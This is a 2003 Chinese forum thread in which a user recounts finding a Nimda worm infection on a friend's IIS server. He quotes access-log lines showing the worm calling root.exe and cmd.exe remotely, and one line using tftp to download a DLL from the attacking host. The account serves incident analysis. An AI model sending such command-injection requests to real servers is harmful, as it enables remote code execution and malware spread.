Board logo

标题: NIMDA病毒接触 [打印本页]

作者: damnyou    时间: 2003-7-17 14:44     标题: NIMDA病毒接触

[这个贴子最后由damnyou在 2003/07/17 06:05pm 第 10 次编辑]


   在帮朋友做机子的时候因为他的机子染了病毒。
   IIS还开着的,也是默认设置,那怎么能不染病毒呢。
   于是我就看了看日志。其中有这么一段:
2003-06-29 04:25:37 IP - ip 80 GET /scripts/root.exe /c+dir 200 -
2003-06-29 04:27:15 IP - ip 80 GET /MSADC/root.exe /c+dir 403 -
2003-06-29 04:27:20 IP - ip 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2003-06-29 04:27:26 IP - ip 80 GET /d/winnt/system32/cmd.exe /c+dir 200 -
2003-06-29 04:36:43 IP - ip 80 GET /scripts/root.exe /c+tftp%20-i%20IP%20GET%20cool.dll%20httpodbc.dll 502 -
   IP是小日本的,ip是我朋友的。估计就是中NIMDA了。
   于是就好解决了,三下五除二就搞定。
   我所关注的是这个IP。于是我就上去看了看。原来是默认的页面。估计也是中毒了。我打开网页后出现如图这个页面。
   看见了吗?这个隐藏着的页面就是下载病毒体“README.EML”的。结果估计是那个机子把病毒杀掉了的缘故,下载出现了问题。所以本来会一闪而过的,结果就总停留在那儿了。
   然后我们打开这个机子默认的页面看了看,马上就找到了病毒修改默认网页留下的恶意代码

   这一段是在离本身正常的网页代码很远的地方被病毒添加上去的(估计是怕被发现)。
    可惜我现在没这个“readme.eml”的代码。以后有空发上来大家看看。

作者: xfiles-ken    时间: 2003-7-19 10:01     标题: NIMDA病毒接触

你不错啊,向你学习,一听你说话的口气就知道是..........高手!




欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/) Powered by Discuz! 7.2